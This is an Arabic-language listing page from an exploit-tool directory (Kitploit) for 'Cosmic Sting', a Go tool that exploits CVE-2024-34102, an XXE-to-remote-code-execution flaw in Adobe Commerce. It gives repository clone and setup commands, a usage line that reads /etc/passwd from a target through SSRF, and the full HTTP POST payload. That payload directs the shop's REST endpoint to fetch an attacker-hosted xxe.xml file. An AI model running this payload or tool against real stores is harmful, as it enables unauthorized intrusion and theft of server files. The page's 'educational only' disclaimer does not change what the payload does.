Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34102 — أداة استغلال مكتوبة بلغة Go لثغرة CVE-2024-34102، وهي ثغرة XXE في Adobe Commerce تؤدي إلى تنفيذ تعليمات برمجية عن بُعد. تدعم فحص عناوين URL واحدة أو دفعات مع قراءة الملفات عبر SSRF. | Kitploit
أدوات/GitHubGitHub/kento-sec/cve-2024-34102
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubkento-sec/cve-2024-34102

CVE-2024-34102

أداة استغلال مكتوبة بلغة Go لثغرة CVE-2024-34102، وهي ثغرة XXE في Adobe Commerce تؤدي إلى تنفيذ تعليمات برمجية عن بُعد. تدعم فحص عناوين URL واحدة أو دفعات مع قراءة الملفات عبر SSRF.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Cosmic Sting: أداة استغلال CVE-2024-34102

Cosmic Sting هي أداة مبنية على Go مصممة لاستغلال CVE-2024-34102، ثغرة تنفيذ التعليمات البرمجية عن بُعد.

تفاصيل CVE-2024-34102

إصدارات Adobe Commerce 2.4.7، 2.4.6-p5، 2.4.5-p7، 2.4.4-p8 والإصدارات الأقدم تتأثر بثغرة تقييد غير صحيح لمرجع الكيان الخارجي XML ('XXE') التي قد تؤدي إلى تنفيذ تعليمات برمجية عشوائية. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال مستند XML معدّل يشير إلى كيانات خارجية. لا يتطلب استغلال هذه المشكلة تفاعل المستخدم.

المتطلبات الأساسية

  • Go (1.16 أو أعلى)

التثبيت

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. تثبيت التبعيات (إن وجدت):

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

URL فردي

لتشغيل الأداة باستخدام URL واحد:

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

العلامات

  • -u, --url : URL واحد لاستغلاله.
  • -f, --file : ملف لقراءته عبر SSRF.
  • -l, --list : ملف يحتوي على قائمة URLs لاستغلالها.

طلب POST لملف DTD XML المُعدّل:

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

الترخيص

هذا المشروع غير مرخص، تم إنشاؤه فقط كمشروع شخصي.

المساهمة

المساهمات مرحب بها! يرجى فتح issue أو إرسال pull request لأي تغييرات.

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن لاختبارها.

المؤلف

البروفيسور هنتر --> تابعني على تويتر

CVE-2024-34102

تنزيل الأداة